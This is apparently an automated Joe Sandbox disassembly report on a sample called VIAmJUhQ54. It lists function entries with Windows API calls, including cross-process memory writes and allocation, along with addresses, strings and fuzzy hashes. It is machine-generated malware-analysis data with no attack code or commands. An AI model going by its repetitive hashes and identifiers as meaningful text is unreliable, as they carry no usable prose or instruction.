                                                                                • Instruction ID: 369e643bfa307b833c52f23688171bcbf898fc093d265740c478d555eae5a10a
                                                                                • Opcode Fuzzy Hash: 4e62be378d7976ab2da010e6f899f831813d6321587abbd2fb10f67d206f2187
                                                                                • Instruction Fuzzy Hash: 9BA13AB2104301AFD701EF64D889EAFB7E8EF98314F00495DF55697192EB74EA09CB62
                                                                                APIs
                                                                                  • Part of subcall function 0072660F: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,007253B1,?,?,007261FF,?,00000000,00000001,00000000), ref: 0072662F
                                                                                • CoInitialize.OLE32(00000000), ref: 0076E85D
                                                                                • CoCreateInstance.OLE32(007ADA7C,00000000,00000001,007AD8EC,?), ref: 0076E876
                                                                                • CoUninitialize.OLE32 ref: 0076E893
                                                                                  • Part of subcall function 0072936C: __swprintf.LIBCMT ref: 007293AB
                                                                                  • Part of subcall function 0072936C: __itow.LIBCMT ref: 007293DF
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000001.00000002.1288510667.0000000000721000.00000020.00000001.01000000.00000003.sdmp, Offset: 00720000, based on PE: true
                                                                                • Associated: 00000001.00000002.1288275823.0000000000720000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000001.00000002.1288572865.00000000007AD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000001.00000002.1288572865.00000000007CE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000001.00000002.1288626390.00000000007DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000001.00000002.1288656746.00000000007E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_1_2_720000_VIAmJUhQ54.jbxd
                                                                                Similarity
                                                                                • API ID: CreateFullInitializeInstanceNamePathUninitialize__itow__swprintf
                                                                                • String ID: .lnk
                                                                                • API String ID: 2126378814-24824748
                                                                                • Opcode ID: b0c440cce6e89df565dbe2a23efe53fda24a016afc785c9bfc3abada03823824
                                                                                • Instruction ID: aeeab9500292c6c0171ad998343c3fdff3aa7390f37829da096d7b2152a878bb
                                                                                • Opcode Fuzzy Hash: b0c440cce6e89df565dbe2a23efe53fda24a016afc785c9bfc3abada03823824
                                                                                • Instruction Fuzzy Hash: 4FA14675604311DFCB14DF14C48892ABBE5FF89310F158948F99A9B3A2CB39EC45CB92
                                                                                APIs
                                                                                • __startOneArgErrorHandling.LIBCMT ref: 007432ED
                                                                                  • Part of subcall function 0074E0D0: __87except.LIBCMT ref: 0074E10B
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000001.00000002.1288510667.0000000000721000.00000020.00000001.01000000.00000003.sdmp, Offset: 00720000, based on PE: true
                                                                                • Associated: 00000001.00000002.1288275823.0000000000720000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000001.00000002.1288572865.00000000007AD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000001.00000002.1288572865.00000000007CE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000001.00000002.1288626390.00000000007DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000001.00000002.1288656746.00000000007E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_1_2_720000_VIAmJUhQ54.jbxd
                                                                                Similarity
                                                                                • API ID: ErrorHandling__87except__start
                                                                                • String ID: pow
                                                                                • API String ID: 2905807303-2276729525
                                                                                • Opcode ID: 72230d9a6a1b4724591b74316b56849b0927111559c64e989356d5f1d49a1d58
                                                                                • Instruction ID: b4074cdaba2871552994b1da3c51908897f9bea8070151ce04d51f0c70893224
                                                                                • Opcode Fuzzy Hash: 72230d9a6a1b4724591b74316b56849b0927111559c64e989356d5f1d49a1d58
                                                                                • Instruction Fuzzy Hash: FB515A31A09206D7CB157B14C94577A3B94BB40730F348E28F4EE861E9EFBC8DC49A46
                                                                                APIs
                                                                                • CharUpperBuffW.USER32(0000000C,00000016,00000016,00000000,00000000,?,00000000,007BDC50,?,0000000F,0000000C,00000016,007BDC50,?), ref: 00764645
                                                                                  • Part of subcall function 0072936C: __swprintf.LIBCMT ref: 007293AB
                                                                                  • Part of subcall function 0072936C: __itow.LIBCMT ref: 007293DF
                                                                                • CharUpperBuffW.USER32(?,?,00000000,?), ref: 007646C5
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000001.00000002.1288510667.0000000000721000.00000020.00000001.01000000.00000003.sdmp, Offset: 00720000, based on PE: true
                                                                                • Associated: 00000001.00000002.1288275823.0000000000720000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000001.00000002.1288572865.00000000007AD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000001.00000002.1288572865.00000000007CE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000001.00000002.1288626390.00000000007DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000001.00000002.1288656746.00000000007E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_1_2_720000_VIAmJUhQ54.jbxd
                                                                                Similarity
                                                                                • API ID: BuffCharUpper$__itow__swprintf
                                                                                • String ID: REMOVE$THIS
                                                                                • API String ID: 3797816924-776492005
                                                                                • Opcode ID: 51210ab113062afc56bc3ca11ced6a1230dba55573b2d4ca3d215336b0b5e05c
                                                                                • Instruction ID: 94575a1535bf5f91ad3120936da840a3da5c6743941c59520d0c7468edd5eb1a
                                                                                • Opcode Fuzzy Hash: 51210ab113062afc56bc3ca11ced6a1230dba55573b2d4ca3d215336b0b5e05c
                                                                                • Instruction Fuzzy Hash: FF416E74A00219DFCF05EFA4C885AAEB7B5FF49304F148469E917AB2A2DB38DD45CB50
                                                                                APIs
                                                                                  • Part of subcall function 0076430B: WriteProcessMemory.KERNEL32(?,?,?,00000000,00000000,00000000,?,0075BC08,?,?,00000034,00000800,?,00000034), ref: 00764335
                                                                                • SendMessageW.USER32(?,00001104,00000000,00000000), ref: 0075C1D3
                                                                                  • Part of subcall function 007642D6: ReadProcessMemory.KERNEL32(?,?,?,00000000,00000000,00000000,?,0075BC37,?,?,00000800,?,00001073,00000000,?,?), ref: 00764300
                                                                                  • Part of subcall function 0076422F: GetWindowThreadProcessId.USER32(?,?), ref: 0076425A
                                                                                  • Part of subcall function 0076422F: OpenProcess.KERNEL32(00000438,00000000,?,?,?,0075BBCC,00000034,?,?,00001004,00000000,00000000), ref: 0076426A
                                                                                  • Part of subcall function 0076422F: VirtualAllocEx.KERNEL32(00000000,00000000,?,00001000,00000004,?,?,0075BBCC,00000034,?,?,00001004,00000000,00000000), ref: 00764280
                                                                                • SendMessageW.USER32(?,00001111,00000000,00000000), ref: 0075C240
                                                                                • SendMessageW.USER32(?,00001111,00000000,00000000), ref: 0075C28D
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000001.00000002.1288510667.0000000000721000.00000020.00000001.01000000.00000003.sdmp, Offset: 00720000, based on PE: true
                                                                                • Associated: 00000001.00000002.1288275823.0000000000720000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000001.00000002.1288572865.00000000007AD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000001.00000002.1288572865.00000000007CE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000001.00000002.1288626390.00000000007DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000001.00000002.1288656746.00000000007E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_1_2_720000_VIAmJUhQ54.jbxd
                                                                                Similarity
                                                                                • API ID: Process$MessageSend$Memory$AllocOpenReadThreadVirtualWindowWrite
                                                                                • String ID: @
                                                                                • API String ID: 4150878124-2766056989
                                                                                • Opcode ID: 746218edad501558f9056cb78904eb17a5a82c97b746603207a9d9a99261b297
                                                                                • Instruction ID: e1b493f450509968d6adfd5caa19e8bf2e071adad9971961e1805aeff03adac6
                                                                                • Opcode Fuzzy Hash: 746218edad501558f9056cb78904eb17a5a82c97b746603207a9d9a99261b297
                                                                                • Instruction Fuzzy Hash: 34413972900218BFDB11DFA4CC85AEEB7B8BF09700F104095FA46B7181DA75AE89CB61
                                                                                APIs
                                                                                • SetWindowPos.USER32(00000000,00000000,00000000,00000000,00000000,00000000,00000013,?,?,SysTreeView32,007BDC00,00000000,?,?,?,?), ref: 0078A6D8
                                                                                • GetWindowLongW.USER32 ref: 0078A6F5
                                                                                • SetWindowLongW.USER32(?,000000F0,00000000), ref: 0078A705
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000001.00000002.1288510667.0000000000721000.00000020.00000001.01000000.00000003.sdmp, Offset: 00720000, based on PE: true
                                                                                • Associated: 00000001.00000002.1288275823.0000000000720000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000001.00000002.1288572865.00000000007AD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000001.00000002.1288572865.00000000007CE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000001.00000002.1288626390.00000000007DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000001.00000002.1288656746.00000000007E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_1_2_720000_VIAmJUhQ54.jbxd
                                                                                Similarity
                                                                                • API ID: Window$Long
                                                                                • String ID: SysTreeView32
                                                                                • API String ID: 847901565-1698111956
                                                                                • Opcode ID: ddcf0751564fddb12a6e555b378975e4a2867a782ef5f0a509fedf149f760dd6
                                                                                • Instruction ID: 15aed149079146d1b588907570e8e9a28901a344004ea1e5d49f9994df5a6e66
                                                                                • Opcode Fuzzy Hash: ddcf0751564fddb12a6e555b378975e4a2867a782ef5f0a509fedf149f760dd6
                                                                                • Instruction Fuzzy Hash: 2D31DE31241206BFEB219E38CC45BEA7BA9FB49324F244326F875932E1D738AC509B50
                                                                                APIs
                                                                                • _memset.LIBCMT ref: 00775190
                                                                                • InternetCrackUrlW.WININET(?,00000000,00000000,?), ref: 007751C6
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000001.00000002.1288510667.0000000000721000.00000020.00000001.01000000.00000003.sdmp, Offset: 00720000, based on PE: true
                                                                                • Associated: 00000001.00000002.1288275823.0000000000720000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000001.00000002.1288572865.00000000007AD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000001.00000002.1288572865.00000000007CE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000001.00000002.1288626390.00000000007DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000001.00000002.1288656746.00000000007E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_1_2_720000_VIAmJUhQ54.jbxd
                                                                                Similarity
                                                                                • API ID: CrackInternet_memset
                                                                                • String ID: |$Dw
                                                                                • API String ID: 1413715105-1392389918
                                                                                • Opcode ID: da144bd75579d3c237ec460a1d69d19a87c5a6f5ed42c0ce030dad9f11d3a42e
                                                                                • Instruction ID: 8dfc1620758ed591049d228612bf65708df9ccff73b2491379454f1f0f2e4f54
                                                                                • Opcode Fuzzy Hash: da144bd75579d3c237ec460a1d69d19a87c5a6f5ed42c0ce030dad9f11d3a42e
                                                                                • Instruction Fuzzy Hash: FD315B71C00119EBCF11EFA4DC85AEE7FB9FF14750F004025F915A6166EB75A906CBA0
                                                                                APIs
                                                                                • SendMessageW.USER32(00000000,00001009,00000000,?), ref: 0078A15E
                                                                                • SetWindowPos.USER32(?,00000000,?,?,?,?,00000004), ref: 0078A172
                                                                                • SendMessageW.USER32(?,00001002,00000000,?), ref: 0078A196
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000001.00000002.1288510667.0000000000721000.00000020.00000001.01000000.00000003.sdmp, Offset: 00720000, based on PE: true
                                                                                • Associated: 00000001.00000002.1288275823.0000000000720000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000001.00000002.1288572865.00000000007AD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000001.00000002.1288572865.00000000007CE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000001.00000002.1288626390.00000000007DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000001.00000002.1288656746.00000000007E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_1_2_720000_VIAmJUhQ54.jbxd
                                                                                Similarity
                                                                                • API ID: MessageSend$Window
                                                                                • String ID: SysMonthCal32
                                                                                • API String ID: 2326795674-1439706946
                                                                                • Opcode ID: f3589be63e36fbe88fc1f987228edbc8a6d0ea4c336ecd9b20b29cfc87d48d45
                                                                                • Instruction ID: 3611b1adbb567be7bdb89dc47a369026848ee66b3f185bd33ccb583e63d9a887
                                                                                • Opcode Fuzzy Hash: f3589be63e36fbe88fc1f987228edbc8a6d0ea4c336ecd9b20b29cfc87d48d45
                                                                                • Instruction Fuzzy Hash: 9421BF32550218BBEF219F94CC86FEA3B79EF48754F110215FE55AB1D0D6B9AC50CB90
                                                                                APIs
                                                                                • SendMessageW.USER32(00000000,00000469,?,00000000), ref: 0078A941
                                                                                • SendMessageW.USER32(00000000,00000465,00000000,80017FFF), ref: 0078A94F
                                                                                • DestroyWindow.USER32(00000000,00000000,?,?,?,00000000,msctls_updown32,00000000,00000000,00000000,00000000,00000000,00000000,?,?,00000000), ref: 0078A956
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000001.00000002.1288510667.0000000000721000.00000020.00000001.01000000.00000003.sdmp, Offset: 00720000, based on PE: true
                                                                                • Associated: 00000001.00000002.1288275823.0000000000720000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000001.00000002.1288572865.00000000007AD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000001.00000002.1288572865.00000000007CE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000001.00000002.1288626390.00000000007DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000001.00000002.1288656746.00000000007E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_1_2_720000_VIAmJUhQ54.jbxd
                                                                                Similarity
                                                                                • API ID: MessageSend$DestroyWindow
                                                                                • String ID: msctls_updown32
                                                                                • API String ID: 4014797782-2298589950
                                                                                • Opcode ID: 584964053873831fa3b53f00e7451067f0194a00e1c484af55ea56d804c5b92d
                                                                                • Instruction ID: 43aab77423896bd674182c15576dc1c7c9d9742a6fd24cbc881ffa7d1a45b75b
                                                                                • Opcode Fuzzy Hash: 584964053873831fa3b53f00e7451067f0194a00e1c484af55ea56d804c5b92d
                                                                                • Instruction Fuzzy Hash: A82192B5640209BFEB11EF18DCC2D6737ADEB5A3A4B45005AFA059B261CB38EC11CB61
                                                                                APIs
                                                                                • SendMessageW.USER32(00000000,00000180,00000000,?), ref: 00789A30
                                                                                • SendMessageW.USER32(?,00000186,00000000,00000000), ref: 00789A40
                                                                                • MoveWindow.USER32(?,?,?,?,?,00000000,?,?,Listbox,00000000,00000000,?,?,?,?,?), ref: 00789A65
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000001.00000002.1288510667.0000000000721000.00000020.00000001.01000000.00000003.sdmp, Offset: 00720000, based on PE: true
                                                                                • Associated: 00000001.00000002.1288275823.0000000000720000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000001.00000002.1288572865.00000000007AD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000001.00000002.1288572865.00000000007CE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000001.00000002.1288626390.00000000007DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000001.00000002.1288656746.00000000007E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_1_2_720000_VIAmJUhQ54.jbxd
                                                                                Similarity
                                                                                • API ID: MessageSend$MoveWindow
                                                                                • String ID: Listbox
                                                                                • API String ID: 3315199576-2633736733
                                                                                • Opcode ID: 9999b403eec31c8860fc6d47ec181fef6222e9daa61983976edb95ac998794f7
                                                                                • Instruction ID: f72dbaefb6effa76f260c2372ce321200d1529c886415e7b2a84cd5a4aac4ae9
                                                                                • Opcode Fuzzy Hash: 9999b403eec31c8860fc6d47ec181fef6222e9daa61983976edb95ac998794f7
                                                                                • Instruction Fuzzy Hash: BC21C532650118BFDF259F54CC85EBF3BAAEF89750F058129FA459B190C679AC11C7A0
                                                                                APIs
                                                                                • SendMessageW.USER32(00000000,00000405,00000000,00000000), ref: 0078A46D
                                                                                • SendMessageW.USER32(?,00000406,00000000,00640000), ref: 0078A482
                                                                                • SendMessageW.USER32(?,00000414,0000000A,00000000), ref: 0078A48F
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000001.00000002.1288510667.0000000000721000.00000020.00000001.01000000.00000003.sdmp, Offset: 00720000, based on PE: true
                                                                                • Associated: 00000001.00000002.1288275823.0000000000720000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000001.00000002.1288572865.00000000007AD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000001.00000002.1288572865.00000000007CE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000001.00000002.1288626390.00000000007DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000001.00000002.1288656746.00000000007E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_1_2_720000_VIAmJUhQ54.jbxd
                                                                                Similarity
                                                                                • API ID: MessageSend
                                                                                • String ID: msctls_trackbar32
                                                                                • API String ID: 3850602802-1010561917
                                                                                • Opcode ID: 006b589437114f8601ac17599bb885a9e55d05c7ba75101cfcddb25bc882dd9f
                                                                                • Instruction ID: f846186acd913df609fd8ba15c07d87830319be53052b4d82fd613bbfa6a3f23
                                                                                • Opcode Fuzzy Hash: 006b589437114f8601ac17599bb885a9e55d05c7ba75101cfcddb25bc882dd9f
                                                                                • Instruction Fuzzy Hash: 30110A71240248BEEF206F65CC49FAB3769FFC9754F014119FA4996091D7B9E811CB24
                                                                                APIs
                                                                                • GetFullPathNameW.KERNEL32(?,00007FFF,?,?,?,00723DEE,007E1148,?,?,?,?,?,00723AA3,?), ref: 00726471
                                                                                • _wcscat.LIBCMT ref: 00795DDB
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000001.00000002.1288510667.0000000000721000.00000020.00000001.01000000.00000003.sdmp, Offset: 00720000, based on PE: true
                                                                                • Associated: 00000001.00000002.1288275823.0000000000720000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000001.00000002.1288572865.00000000007AD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000001.00000002.1288572865.00000000007CE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000001.00000002.1288626390.00000000007DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000001.00000002.1288656746.00000000007E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_1_2_720000_VIAmJUhQ54.jbxd
                                                                                Similarity
                                                                                • API ID: FullNamePath_wcscat
                                                                                • String ID: h$pi
                                                                                • API String ID: 2109976907-720832520
                                                                                • Opcode ID: f3befe7cbffe550ab09beceb25bee8981fa40555f2cf0c375a7f511223096259
                                                                                • Instruction ID: 17e5f4a081afbc930947fb7dd51688b67dd83a1c59d560a4496c45fbcd108e9c
                                                                                • Opcode Fuzzy Hash: f3befe7cbffe550ab09beceb25bee8981fa40555f2cf0c375a7f511223096259
                                                                                • Instruction Fuzzy Hash: 39116531A05165DB8B01FBA4ED46ACD73F8AF08354B108166B689D7240DA7C97C88761
                                                                                APIs
                                                                                • LoadLibraryExW.KERNEL32(combase.dll,00000000,00000800,RoInitialize,00742350,?), ref: 007422A1
                                                                                • GetProcAddress.KERNEL32(00000000), ref: 007422A8
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000001.00000002.1288510667.0000000000721000.00000020.00000001.01000000.00000003.sdmp, Offset: 00720000, based on PE: true
                                                                                • Associated: 00000001.00000002.1288275823.0000000000720000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000001.00000002.1288572865.00000000007AD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000001.00000002.1288572865.00000000007CE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000001.00000002.1288626390.00000000007DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000001.00000002.1288656746.00000000007E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_1_2_720000_VIAmJUhQ54.jbxd
                                                                                Similarity
                                                                                • API ID: AddressLibraryLoadProc
                                                                                • String ID: RoInitialize$combase.dll
                                                                                • API String ID: 2574300362-340411864
                                                                                • Opcode ID: d70c5aa040b1024e7f644828395c7d9dd495d0a1e37da805734a26b529470051
                                                                                • Instruction ID: 7430107477ce4891cf5c3e8d365d78644dbbfe12091e1206b24a5ab553a1d7c3
                                                                                • Opcode Fuzzy Hash: d70c5aa040b1024e7f644828395c7d9dd495d0a1e37da805734a26b529470051
                                                                                • Instruction Fuzzy Hash: 79E01A70691344ABDB205F70EC89B193A65B749702F41C020F102ED0E0DBFC4881CF4C
                                                                                APIs
                                                                                • LoadLibraryExW.KERNEL32(combase.dll,00000000,00000800,RoUninitialize,00742276), ref: 00742376
                                                                                • GetProcAddress.KERNEL32(00000000), ref: 0074237D
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000001.00000002.1288510667.0000000000721000.00000020.00000001.01000000.00000003.sdmp, Offset: 00720000, based on PE: true
                                                                                • Associated: 00000001.00000002.1288275823.0000000000720000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000001.00000002.1288572865.00000000007AD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000001.00000002.1288572865.00000000007CE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000001.00000002.1288626390.00000000007DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000001.00000002.1288656746.00000000007E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_1_2_720000_VIAmJUhQ54.jbxd
                                                                                Similarity
                                                                                • API ID: AddressLibraryLoadProc
                                                                                • String ID: RoUninitialize$combase.dll
                                                                                • API String ID: 2574300362-2819208100
                                                                                • Opcode ID: a0a0196e4e13820755d85e201f345963d0990e03a4754f971bbbee4471bf355f
                                                                                • Instruction ID: 904dfa4a99accad541ef94dd8e747ee5f7af5cacd0acf0c80f2a602a2591dd5f
                                                                                • Opcode Fuzzy Hash: a0a0196e4e13820755d85e201f345963d0990e03a4754f971bbbee4471bf355f
                                                                                • Instruction Fuzzy Hash: D1E0B6B0646348ABDB305FA0ED4DB083A76B749702F11C425F10AEA4B0EBFC5C90CA5D
                                                                                APIs
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000001.00000002.1288510667.0000000000721000.00000020.00000001.01000000.00000003.sdmp, Offset: 00720000, based on PE: true
                                                                                • Associated: 00000001.00000002.1288275823.0000000000720000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000001.00000002.1288572865.00000000007AD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000001.00000002.1288572865.00000000007CE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000001.00000002.1288626390.00000000007DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000001.00000002.1288656746.00000000007E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_1_2_720000_VIAmJUhQ54.jbxd
                                                                                Similarity
                                                                                • API ID: LocalTime__swprintf
                                                                                • String ID: %.3d$WIN_XPe
                                                                                • API String ID: 2070861257-2409531811
                                                                                • Opcode ID: 752e342b46fae5ff81c2b0994cc50a264514da8f9a8d83bcfe7e678798057d81
                                                                                • Instruction ID: 031ead2b52740513e3a2b3f59d87a8d5e310f4715f3e43f9e6b5a3b4c1eb3d27
                                                                                • Opcode Fuzzy Hash: 752e342b46fae5ff81c2b0994cc50a264514da8f9a8d83bcfe7e678798057d81
                                                                                • Instruction Fuzzy Hash: 62E012B1805618FBCF119750ED09DF9737CE705741F5004D2B946A5100D73D9B84EB76
                                                                                APIs
                                                                                • LoadLibraryA.KERNEL32(kernel32.dll,?,007821FB,?,007823EF), ref: 00782213
                                                                                • GetProcAddress.KERNEL32(00000000,GetProcessId), ref: 00782225
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000001.00000002.1288510667.0000000000721000.00000020.00000001.01000000.00000003.sdmp, Offset: 00720000, based on PE: true
                                                                                • Associated: 00000001.00000002.1288275823.0000000000720000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000001.00000002.1288572865.00000000007AD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000001.00000002.1288572865.00000000007CE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000001.00000002.1288626390.00000000007DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000001.00000002.1288656746.00000000007E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_1_2_720000_VIAmJUhQ54.jbxd
                                                                                Similarity
                                                                                • API ID: AddressLibraryLoadProc
                                                                                • String ID: GetProcessId$kernel32.dll
                                                                                • API String ID: 2574300362-399901964
                                                                                • Opcode ID: feed631996f67710980aab49586f06c215cbe041438155b0f13de1616b9da0bc
                                                                                • Instruction ID: 21be5a8a23a24c4debf028b5f12ec60e05897d2bfa1f64b6fb8c4c0ec23f1757
                                                                                • Opcode Fuzzy Hash: feed631996f67710980aab49586f06c215cbe041438155b0f13de1616b9da0bc
                                                                                • Instruction Fuzzy Hash: 06D05E744407169FC7215B60F808601B6E5EB06302B02841AE846A2651D678D8828760
                                                                                APIs
                                                                                • LoadLibraryA.KERNEL32(kernel32.dll,00000000,007242EC,?,007242AA,?), ref: 00724304
                                                                                • GetProcAddress.KERNEL32(00000000,Wow64RevertWow64FsRedirection), ref: 00724316
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000001.00000002.1288510667.0000000000721000.00000020.00000001.01000000.00000003.sdmp, Offset: 00720000, based on PE: true
                                                                                • Associated: 00000001.00000002.1288275823.0000000000720000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000001.00000002.1288572865.00000000007AD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000001.00000002.1288572865.00000000007CE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000001.00000002.1288626390.00000000007DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000001.00000002.1288656746.00000000007E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_1_2_720000_VIAmJUhQ54.jbxd
                                                                                Similarity
                                                                                • API ID: AddressLibraryLoadProc
                                                                                • String ID: Wow64RevertWow64FsRedirection$kernel32.dll
                                                                                • API String ID: 2574300362-1355242751
                                                                                • Opcode ID: ef21a8289fb92dece396abdb5e8f73b2aa43060b17237f7d3d07ea5eacbe1ba8
                                                                                • Instruction ID: d788080cdf3b3377aa8090c084d000a32ade0d96185cdb702e571409e9743e28
                                                                                • Opcode Fuzzy Hash: ef21a8289fb92dece396abdb5e8f73b2aa43060b17237f7d3d07ea5eacbe1ba8
                                                                                • Instruction Fuzzy Hash: BAD0A7704007229FC7308F60F80C60577F4AF15301B01841EE447E2661D7BCCC818610
                                                                                APIs
                                                                                • LoadLibraryA.KERNEL32(kernel32.dll,007241BB,00724341,?,0072422F,?,007241BB,?,?,?,?,007239FE,?,00000001), ref: 00724359
                                                                                • GetProcAddress.KERNEL32(00000000,Wow64DisableWow64FsRedirection), ref: 0072436B
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000001.00000002.1288510667.0000000000721000.00000020.00000001.01000000.00000003.sdmp, Offset: 00720000, based on PE: true
